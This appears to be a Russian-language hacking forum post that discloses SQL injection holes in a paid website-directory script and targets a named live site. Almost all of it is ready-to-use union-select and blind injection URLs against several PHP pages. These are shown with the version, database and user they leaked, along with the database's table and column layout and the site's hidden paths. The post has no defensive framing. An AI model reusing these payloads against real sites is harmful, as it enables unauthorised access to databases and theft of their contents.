Сайт разработчика: http://valdis.org.ru Исходников нет, ибо скрипт платный и в паблике его нет. его вообще нигде нет, кроме как у автора, я не нашел во всяком случае =\ SQL inj в site.php?id= Code: http://valdis.org.ru/site.php?id=2758+and+1=0+union+select+version(),2,3,4,5,6,7,8,database(),user(),11,12,13,14,15,16,17-- 5.0.81-community valdis_valdis valdis_valdis@localhost Структура БД: Code: [COLOR=White][I]table_name ; column_name[/I][/COLOR] stat_valdis ; id, ip, date, page, ref, user catid ; catid, catname, catstatus, cattitle link ; link_id, link_project_id, link_category_id, link_manufacter_id, link_name, link_len, link_status site ; siteid, sitesubid, sitedomain, sitestatus, sitetitle, sitename, siteurl, sitedescription, sitekeywords, siterecip, siteaddemail, siteadddate, sitelastdate, sitehost Запрещено к индексированию: Code: /gotosite.php /google /goget /context.php /gosite.php /img.php /contact.php /xap.php /alfa.php /partner.php /add1.php /sape.php /sot.php /hosting.php /test /article /sotmarket.php /jamba /image.php /shop.php?magaz=otziv_add /shop.php?magaz=otziv_view /shop.php?magaz=topic
SQL injection: /add.php Пример: Code: http://valdis.org.ru/add.php?id=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7-- Blind SQL injection: /cat.php Пример: Code: http://valdis.org.ru/cat.php?id=7%20and%20substring(@@version,1,1)=5 SQL injection: /sub.php Пример: Code: http://valdis.org.ru/sub.php?id=-54%20union%20select%201,2,concat_ws(0x3a,user(),database(),version()),4,5,6--